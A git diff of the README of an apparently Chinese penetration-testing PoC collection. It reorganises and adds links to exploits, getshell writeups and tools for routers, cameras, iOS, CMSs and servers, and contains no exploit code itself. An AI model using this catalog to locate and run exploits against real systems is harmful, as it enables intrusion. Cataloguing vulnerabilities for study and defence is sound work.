diff --git a/BlueKeep/requirements.txt b/BlueKeep/requirements.txt deleted file mode 100644 index 5be82196a..000000000 --- a/BlueKeep/requirements.txt +++ /dev/null @@ -1 +0,0 @@ -pyopenssl==19.0 \ No newline at end of file diff --git a/README.md b/README.md index 3e30c4b09..e3b78f3a0 100644 --- a/README.md +++ b/README.md @@ -4,50 +4,51 @@ **请注意所有工具是否有后门或者其他异常行为,建议均在虚拟环境操作。** -- [ Penetration_Testing_POC](#head1) -- [ 请善用搜索[`Ctrl+F`]查找](#head2) +- [Penetration_Testing_POC](#head1) +- [请善用搜索[`Ctrl+F`]查找](#head2) - [IOT Device&Mobile Phone](#head3) - [Web APP](#head4) -- [ 提权辅助相关](#head5) -- [ PC](#head6) -- [ tools-小工具集合](#head7) -- [ 文章/书籍/教程相关](#head8) -- [ 说明](#head9) +- [提权辅助相关](#head5) +- [PC](#head6) +- [tools-小工具集合](#head7) +- [文章/书籍/教程相关](#head8) +- [说明](#head9) ## 请善用搜索[`Ctrl+F`]查找 ## IOT Device&Mobile Phone -- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md) -- [华为WS331a产品管理页面存在CSRF漏洞](华为WS331a产品管理页面存在CSRF漏洞.md) -- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) -- [D-Link路由器RCE漏洞](./CVE-2019-16920-D-Link-rce.md) -- [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./CVE-2019-13051) +- [天翼创维awifi路由器存在多处未授权访问漏洞](./iot/天翼创维awifi路由器存在多处未授权访问漏洞.md) +- [华为WS331a产品管理页面存在CSRF漏洞](./iot/华为WS331a产品管理页面存在CSRF漏洞.md) +- [CVE-2019-16313 蜂网互联企业级路由器v4.31密码泄露漏洞](./iot/CVE-2019-16313%20蜂网互联企业级路由器v4.31密码泄露漏洞.md) +- [D-Link路由器RCE漏洞](./iot/CVE-2019-16920-D-Link-rce.md) +- [CVE-2019-13051-Pi-Hole路由端去广告软件的命令注入&权限提升](./vuln_pocs/cve/CVE-2019-13051) - [D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [Huawei HG255 Directory Traversal[目录穿越]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[本地备份文件](./tools/huaweihg255-traversal.rb) -- [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) +- [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdgi%20(Metasploit)%20CVE-2019-20215.rb) - [从 Interfaces.d 到 RCE:Mozilla WebThings IoT 网关漏洞挖掘](https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/) - [小米系列路由器远程命令执行漏洞(CVE-2019-18370,CVE-2019-18371)](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md) - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-未经验证即可替换固件)](https://www.exploit-db.com/exploits/48158) - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3权限提升漏洞发现分析复现过程](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5权限提升](https://www.exploit-db.com/exploits/48154) -- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md) +- [CVE-2020-9374-TP LINK TL-WR849N - RCE](./iot/CVE-2020-9374.md) - [CVE-2020-12753-LG 智能手机任意代码执行漏洞](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) - [CVE-2020-12695-UPnP 安全漏洞](https://github.com/yunuscadirci/CallStranger) - [79款 Netgear 路由器遭远程接管0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py) - [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits) - [wacker:一组脚本,可辅助对WPA3接入点执行在线词典攻击](https://github.com/blunderbuss-wctf/wacker) - [CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析](./books/CVE-2020-24581%20D-Link%20DSL-2888A%20远程命令执行漏洞分析.pdf)-[原地址](https://www.anquanke.com/post/id/229323) -- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md) +- [CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞](./iot/CNVD-2021-14536_锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞.md) - [CNVD-2021-14544:Hikvision 海康威视流媒体管理服务器任意文件读取](https://github.com/Henry4E36/Hikvision) - [CNVD-2020-25078:D-link 敏感信息泄漏,可以直接获取账户密码查看监控](https://github.com/Henry4E36/D-link-information) - [ios-gamed-0day](https://github.com/illusionofchaos/ios-gamed-0day) - [ios-nehelper-wifi-info-0day](https://github.com/illusionofchaos/ios-nehelper-wifi-info-0day) - [ios-nehelper-enum-apps-0day](https://github.com/illusionofchaos/ios-nehelper-enum-apps-0day) - [iOS 15.0.1 RCE PoC](https://github.com/jonathandata1/ios_15_rce) +- [DarkSword-RCE:Apple iOS 远程代码执行漏洞利用](https://github.com/htimesnine/DarkSword-RCE)|[darksword-kexploit:Apple iOS 内核漏洞利用](https://github.com/opa334/darksword-kexploit)|[DarkSword:Apple iOS 漏洞利用](https://github.com/ghh-jb/DarkSword) - [CVE-2021-36260:海康威视产品命令注入漏洞](https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html) - [CVE-2021-33044、CVE-2021-33045 大华摄像头POC](https://github.com/mcw0/DahuaConsole)|[相关分析](https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt)|[登录绕过chrome 插件](https://github.com/bp2008/DahuaLoginBypass) - [CVE-2021-36260:海康威视命令注入漏洞](https://github.com/rabbitsafe/CVE-2021-36260)|[又一个CVE-2021-36260利用脚本](https://github.com/Cuerz/CVE-2021-36260) -- [CVE-2021-41653:TP-Link TL-WR840N V5(EU) - RCE ](./books/TP-Link%20TL-WR840N%20V5(EU)%20-%20RCE%20-%20CVE-2021-41653.pdf) +- [CVE-2021-41653:TP-Link TL-WR840N V5(EU) - RCE](./books/TP-Link%20TL-WR840N%20V5(EU)%20-%20RCE%20-%20CVE-2021-41653.pdf) - [DirtyPipe-Android:Dirty Pipe root exploit for Android](https://github.com/polygraphene/DirtyPipe-Android) - [CVE-2022-30075:Tp-Link Archer AX50 Authenticated RCE](https://github.com/aaronsvk/CVE-2022-30075) - [NotQuite0day:D-Link 1960相关漏洞](https://github.com/star-sg/NotQuite0day) @@ -59,7 +60,7 @@ - [IOT_vuln:IOT相关漏洞仓库](https://github.com/EPhaha/IOT_vuln) - [hikvision_CVE-2017-7921_auth_bypass_config_decryptor:解密受CVE-2017-7921影响的海康威视的配置文件](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) - [CVE-2022-20866:思科自适应安全设备软件和 Firepower 威胁防御软件 RSA 私钥泄漏检查](https://github.com/CiscoPSIRT/CVE-2022-20866) -- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md) +- [WLAN-AP-WEA453e RCE:三星路由器远程命令执行漏洞](./iot/WLAN-AP-WEA453e%20RCE三星路由器远程命令执行漏洞.md) - [Buffer overflow in Xiongmai DVRs](https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/)|[备份](https://web.archive.org/web/20221129205148/https://blog.ret2.me/post/2022-01-26-exploiting-xiongmai-dvrs/) - [CVE-2023-27350: PaperCut NG身份验证绕过导致的RCE](https://github.com/horizon3ai/CVE-2023-27350) - [ivms-8700-0day-poc: 海康威视iVMS-8700综合安防管理平台任意文件上传漏洞](https://github.com/spmonkey/ivms-8700-0day-poc) @@ -80,90 +81,99 @@ - [从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link Di-7200G 命令注入漏洞)](./books/从jhttpd分析到系统命令注入(CVE-2021-46227-D-Link%20Di-7200G%20命令注入漏洞).html) - [2024 RWCTF群晖 BC500摄像头RCE--未授权_栈溢出](./books/2024%20RWCTF群晖%20BC500摄像头RCE--未授权_栈溢出.html) - [路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取](./books/路由器dd手动提取固件---迅捷PoEAC路由一体机FR100P-AC固件提取.html) +- [NX_Firmware:任天堂Switch各版本固件数据库](https://github.com/THZoria/NX_Firmware) +- [vphone-aio:一键运行已越狱并安装完整bootstrap的iOS虚拟手机(vphone)脚本](https://github.com/34306/vphone-aio) +- [AssppJailbroken:一款用于解密从 App Store 下载的最新 IPA 文件的工具,并支持在已越狱的 iOS 设备及 iPhone 模拟器上运行](https://github.com/lbr77/AssppJailbroken) +- [FirmWire:支持三星 Shannon 和 MediaTek 基带固件的全系统动态分析平台,可用于模糊测试、漏洞根因分析与调试](https://github.com/FirmWire/FirmWire) +- [Podroid:无需 root 即可在 Android 手机上运行 Linux 容器,基于 QEMU 启动 Alpine Linux 虚拟机并提供完整的 Podman 容器运行时](https://github.com/ExTV/Podroid) +- [PrismSpace:基于 Android 工作资料(managed profile)的应用双开管理器](https://github.com/yzddmr6/PrismSpace) +- [Tsec-Salon:腾讯安全沙龙历届活动材料](https://github.com/Yeti-791/Tsec-Salon)|[BLACKHAT_Asia2026: Black Hat Asia 2026 议题资料汇总](https://github.com/Mr-xn/BLACKHAT_Asia2026)|[Java Ghost Bits - Black Hat Asia 2026 演讲PDF(幽灵比特位:高位截断)](https://i.blackhat.com/Asia-26/Presentations/Asia-26-Bai-Cast-Attack-Ghost-Bits-4.23.pdf)|[GBitsTools: Ghost Bits攻击工具(Python GUI/CLI)](https://github.com/shiyeshu/GBitsTools)|[GbitsGen: Ghost Bits字符生成工具](https://github.com/qi4L/GbitsGen)|[ghost-bits-lab: Ghost Bits交互式安全实验靶机(Java)](https://github.com/Xc1Ym/ghost-bits-lab) +- [CVE-2026-34908-check:UniFi OS Server 身份验证绕过与未授权远程代码执行(RCE)检测工具](https://github.com/BishopFox/CVE-2026-34908-check) | [相关技术分析:Popping Root on UniFi OS Server](https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis) ## Web APP -- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) -- [Couch through 2.0存在路径泄露漏洞 ](Couch%20through%202.0存在路径泄露漏洞.md) -- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) -- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) -- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) -- [Z-Blog 1.5.1.1740存在XSS漏洞](Z-Blog%201.5.1.1740存在XSS漏洞.md) -- [YzmCMS 3.6存在XSS漏洞](YzmCMS%203.6存在XSS漏洞.md) -- [Cobub Razor 0.7.2越权增加管理员账户](Cobub%20Razor%200.7.2越权增加管理员账户.md) -- [Cobub Razor 0.8.0存在SQL注入漏洞](Cobub%20Razor%200.8.0存在SQL注入漏洞.md) -- [Cobub Razor 0.8.0存在物理路径泄露漏洞](Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) -- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) -- [DomainMod的XSS集合](DomainMod的XSS集合.md) -- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) -- [yii2-statemachine v2.x.x存在XSS漏洞](yii2-statemachine%20v2.x.x存在XSS漏洞.md) -- [maccms_v10存在CSRF漏洞可增加任意账号](maccms_v10存在CSRF漏洞可增加任意账号.md) -- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) -- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) +- [致远OA_A8_getshell_0day](./web/致远OA_A8_getshell_0day.md) +- [Couch through 2.0存在路径泄露漏洞](./web/Couch%20through%202.0存在路径泄露漏洞.md) +- [Cobub Razor 0.7.2存在跨站请求伪造漏洞](./web/Cobub%20Razor%200.7.2存在跨站请求伪造漏洞.md) +- [joyplus-cms 1.6.0存在CSRF漏洞可增加管理员账户](./web/joyplus-cms%201.6.0存在CSRF漏洞可增加管理员账户.md) +- [MiniCMS 1.10存在CSRF漏洞可增加管理员账户](./web/MiniCMS%201.10存在CSRF漏洞可增加管理员账户.md) +- [Z-Blog 1.5.1.1740存在XSS漏洞](./web/Z-Blog%201.5.1.1740存在XSS漏洞.md) +- [YzmCMS 3.6存在XSS漏洞](./web/YzmCMS%203.6存在XSS漏洞.md) +- [Cobub Razor 0.7.2越权增加管理员账户](./web/Cobub%20Razor%200.7.2越权增加管理员账户.md) +- [Cobub Razor 0.8.0存在SQL注入漏洞](./web/Cobub%20Razor%200.8.0存在SQL注入漏洞.md) +- [Cobub Razor 0.8.0存在物理路径泄露漏洞](./web/Cobub%20Razor%200.8.0存在物理路径泄露漏洞.md) +- [五指CMS 4.1.0存在CSRF漏洞可增加管理员账户](./web/五指CMS%204.1.0存在CSRF漏洞可增加管理员账户.md) +- [DomainMod的XSS集合](./web/DomainMod的XSS集合.md) +- [GreenCMS v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户](./web/GreenCMS%20v2.3.0603存在CSRF漏洞可获取webshell&增加管理员账户.md) +- [yii2-statemachine v2.x.x存在XSS漏洞](./web/yii2-statemachine%20v2.x.x存在XSS漏洞.md) +- [maccms_v10存在CSRF漏洞可增加任意账号](./web/maccms_v10存在CSRF漏洞可增加任意账号.md) +- [LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户](./web/LFCMS%203.7.0存在CSRF漏洞可添加任意用户账户或任意管理员账户.md) +- [Finecms_v5.4存在CSRF漏洞可修改管理员账户密码](./web/Finecms_v5.4存在CSRF漏洞可修改管理员账户密码.md) - [Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)内核驱动拒绝服务漏洞.md) -- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) -- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) -- [indexhibit cms v2.1.5 直接编辑php文件getshell](indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) -- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) -- [S-CMS PHP v3.0存在SQL注入漏洞](S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) -- [MetInfoCMS 5.X版本GETSHELL漏洞合集](MetInfoCMS%205.X版本GETSHELL漏洞合集.md) +- [Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞](./web/Metinfo-6.1.2版本存在XSS漏洞&SQL注入漏洞.md) +- [Hucart cms v5.7.4 CSRF漏洞可任意增加管理员账号](./web/Hucart%20cms%20v5.7.4%20CSRF漏洞可任意增加管理员账号.md) +- [indexhibit cms v2.1.5 直接编辑php文件getshell](./web/indexhibit%20cms%20v2.1.5%20直接编辑php文件getshell.md) +- [S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号](./web/S-CMS企业建站系统PHP版v3.0后台存在CSRF可添加管理员权限账号.md) +- [S-CMS PHP v3.0存在SQL注入漏洞](./web/S-CMS%20PHP%20v3.0存在SQL注入漏洞.md) +- [MetInfoCMS 5.X版本GETSHELL漏洞合集](./web/MetInfoCMS%205.X版本GETSHELL漏洞合集.md) - [MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf](./books/MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较).pdf) -- [discuz ml RCE 漏洞检测工具](discuz-ml-rce/README.md) -- [thinkphp5框架缺陷导致远程代码执行](thinkphp5框架缺陷导致远程代码执行.md) -- [FineCMS_v5.0.8两处getshell](FineCMS_v5.0.8两处getshell.md) -- [Struts2_045漏洞批量检测|搜索引擎采集扫描](Struts2_045-Poc) -- [thinkphp5命令执行](thinkphp5命令执行.md) -- [typecho反序列化漏洞](typecho反序列化漏洞.md) -- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) +- [discuz ml RCE 漏洞检测工具](vuln_pocs/exploit-tools/discuz-ml-rce/README.md) +- [thinkphp5框架缺陷导致远程代码执行](./web/thinkphp5框架缺陷导致远程代码执行.md) +- [FineCMS_v5.0.8两处getshell](./web/FineCMS_v5.0.8两处getshell.md) +- [Struts2_045漏洞批量检测|搜索引擎采集扫描](vuln_pocs/exploit-tools/Struts2_045-Poc) +- [thinkphp5命令执行](./web/thinkphp5命令执行.md) +- [typecho反序列化漏洞](./web/typecho反序列化漏洞.md) +- [CVE-2019-10173 Xstream 1.4.10版本远程代码执行](./web/CVE-2019-10173%20Xstream%201.4.10版本远程代码执行漏洞.md) - [IIS/CVE-2017-7269-Echo-PoC](./IIS/CVE-2017-7269-Echo-PoC) -- [CVE-2019-15107 Webmin RCE](./CVE-2019-15107) -- [thinkphp5 rce漏洞检测工具](./tp5-getshell) -- [thinkphp5_RCE合集](./tp5-getshell/TP5_RCE合集.md) -- [thinkphp3.X-thinkphp5.x](./tp5-getshell/ThinkPHP.md) +- [CVE-2019-15107 Webmin RCE](./vuln_pocs/cve/CVE-2019-15107) +- [thinkphp5 rce漏洞检测工具](./vuln_pocs/exploit-tools/tp5-getshell) +- [thinkphp5_RCE合集](./vuln_pocs/exploit-tools/tp5-getshell/TP5_RCE合集.md) +- [thinkphp3.X-thinkphp5.x](./vuln_pocs/exploit-tools/tp5-getshell/ThinkPHP.md) - [关于ThinkPHP框架的历史漏洞分析集合](https://github.com/Mochazz/ThinkPHP-Vuln) -- [CVE-2019-11510](./CVE-2019-11510) -- [Redis(<=5.0.5) RCE](./redis-rogue-server) +- [CVE-2019-11510](./vuln_pocs/cve/CVE-2019-11510) +- [Redis(<=5.0.5) RCE](./vuln_pocs/exploit-tools/redis-rogue-server) - [Redis 4.x/5.x RCE(主从复制导致RCE)](https://github.com/Ridter/redis-rce) - [生成Redis恶意模块so文件配合主从复制RCE达到命令执行](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)|[相关文章](https://www.freebuf.com/vuls/224235.html) - [RedisWriteFile-通过 `Redis` 主从写出无损文件,可用于 `Windows` 平台下写出无损的 `EXE`、`DLL`、 `LNK` 和 `Linux` 下的 `OS` 等二进制文件](https://github.com/r35tart/RedisWriteFile) -- [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./WeblogicScanLot) -- [jboss_CVE-2017-12149](./jboss_CVE-2017-12149) -- [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./CVE-2018-6389) +- [WeblogicScanLot系列,Weblogic漏洞批量检测工具](./vuln_pocs/exploit-tools/WeblogicScanLot) +- [TongWeb EJB 利用与插件工具](https://github.com/Axyanzzzz/TongWebEJBExploit) | [TongwebPlugin](https://github.com/Gary-yang1/TongwebPlugin) +- [jboss_CVE-2017-12149](./vuln_pocs/exploit-tools/jboss_CVE-2017-12149) +- [Wordpress的拒绝服务(DoS)-CVE-2018-6389](./vuln_pocs/cve/CVE-2018-6389) - [Webmin Remote Code Execution (authenticated)-CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) -- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) -- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) -- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) -- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) -- [泛微OA管理系统RCE漏洞利用脚本](./泛微OA管理系统RCE漏洞利用脚本.md) -- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) -- [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./zentao-getshell) -- [泛微 e-cology OA 前台SQL注入漏洞](./泛微%20e-cology%20OA%20前台SQL注入漏洞.md) -- [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) -- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) -- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md) -- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) -- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) -- [CVE-2019-11043-PHP远程代码执行漏](./CVE-2019-11043) -- [ThinkCMF漏洞全集和](./ThinkCMF漏洞全集和.md) -- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) +- [CVE-2019-16131 OKLite v1.2.25 任意文件上传漏洞](./web/CVE-2019-16131%20OKLite%20v1.2.25%20任意文件上传漏洞.md) +- [CVE-2019-16132 OKLite v1.2.25 存在任意文件删除漏洞](./web/CVE-2019-16132%20OKLite%20v1.2.25%20存在任意文件删除漏洞.md) +- [CVE-2019-16309 FlameCMS 3.3.5 后台登录处存在sql注入漏洞](./web/CVE-2019-16309%20FlameCMS%203.3.5%20后台登录处存在sql注入漏洞.md) +- [CVE-2019-16314 indexhibit cms v2.1.5 存在重装并导致getshell](./web/CVE-2019-16314%20indexhibit%20cms%20v2.1.5%20存在重装并导致getshell.md) +- [泛微OA管理系统RCE漏洞利用脚本](./web/泛微OA管理系统RCE漏洞利用脚本.md) +- [CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit](./web/CVE-2019-16759%20vBulletin%205.x%200day%20pre-auth%20RCE%20exploit.md) +- [zentao-getshell 禅道8.2 - 9.2.1前台Getshell](./vuln_pocs/exploit-tools/zentao-getshell) +- [泛微 e-cology OA 前台SQL注入漏洞](./web/泛微%20e-cology%20OA%20前台SQL注入漏洞.md) +- [Joomla-3.4.6-RCE](./web/Joomla-3.4.6-RCE.md) +- [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./web/Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) +- [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./web/构建ASMX绕过限制WAF达到命令执行.md) +- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./web/CVE-2019-17662-ThinVNC%201.0b1%20-%20Authentication%20Bypass.md) +- [CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd](./web/CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd.md) +- [CVE-2019-11043-PHP远程代码执行漏](./vuln_pocs/cve/CVE-2019-11043) +- [ThinkCMF漏洞全集和](./web/ThinkCMF漏洞全集和.md) +- [CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行](./web/CVE-2019-7609-kibana低于6.6.0未授权远程代码命令执行.md) - [ecologyExp.jar-泛微ecology OA系统数据库配置文件读取](./tools/ecologyExp.jar) -- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./freeFTP1.0.8-'PASS'远程缓冲区溢出.md) -- [rConfig v3.9.2 RCE漏洞](./rConfig%20v3.9.2%20RCE漏洞.md) -- [apache_solr_rce](./solr_rce.md) -- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) +- [freeFTP1.0.8-'PASS'远程缓冲区溢出](./web/freeFTP1.0.8-'PASS'远程缓冲区溢出.md) +- [rConfig v3.9.2 RCE漏洞](./web/rConfig%20v3.9.2%20RCE漏洞.md) +- [apache_solr_rce](./web/solr_rce.md) +- [CVE-2019-7580 thinkcmf-5.0.190111后台任意文件写入导致的代码执行](./web/CVE-2019-7580%20thinkcmf-5.0.190111后台任意文件写入导致的代码执行.md) - [Apache Flink任意Jar包上传导致远程代码执行](https://github.com/LandGrey/flink-unauth-rce) - [Jwt_Tool - 用于验证、伪造、扫描和篡改 JWT(JSON Web 令牌)](https://github.com/ticarpi/jwt_tool) -- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) +- [cve-2019-17424 nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC](./web/cve-2019-17424%20nipper-ng_0.11.10-Remote_Buffer_Overflow远程缓冲区溢出附PoC.md) - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) -- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) -- [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) +- [Apache Solr RCE via Velocity Template Injection](./web/Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) +- [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution](https://github.com/masahiro331/CVE-2019-10758/) - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) -- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf) -- [WDJACMS1.5.2模板注入漏洞](./WDJACMS1.5.2模板注入漏洞.md) +- [ZZCMS201910 SQL Injections](./web/ZZCMS201910%20SQL%20Injections.md)|[ZZCMS201910代码审计](./books/ZZCMS201910代码审计.pdf) +- [WDJACMS1.5.2模板注入漏洞](./web/WDJACMS1.5.2模板注入漏洞.md) - [CVE-2019-19781-Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway](https://github.com/projectzeroindia/CVE-2019-19781) - [CVE-2019-19781.nse---use Nmap check Citrix ADC Remote Code Execution](https://github.com/cyberstruggle/DeltaGroup/tree/master/CVE-2019-19781) - [Mysql Client 任意文件读取攻击链拓展](https://paper.seebug.org/1112/) @@ -178,35 +188,35 @@ - [ThinkPHP 6.x反序列化POP链(二)](./books/ThinkPHP%206.x反序列化POP链(二).pdf)|[原文链接](https://mp.weixin.qq.com/s/q8Xa3triuXEB3NoeOgka1g) - [ThinkPHP 6.x反序列化POP链(三)](./books/ThinkPHP%206.x反序列化POP链(三).pdf)|[原文链接](https://mp.weixin.qq.com/s/PFNt3yF0boE5lR2KofghBg) - [WordPress InfiniteWP - Client Authentication Bypass (Metasploit)](https://www.exploit-db.com/exploits/48047) -- [【Linux提权/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051) +- [【Linux/RCE】OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution](https://www.exploit-db.com/exploits/48051) - [CVE-2020-7471-django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter)使用了不安全的数据会造成SQL注入漏洞环境和POC](https://github.com/Saferman/CVE-2020-7471) - [CVE-2019-17564 : Apache Dubbo反序列化漏洞](https://www.anquanke.com/post/id/198747) - [CVE-2019-2725(CNVD-C-2019-48814、WebLogic wls9-async)](https://github.com/lufeirider/CVE-2019-2725) - 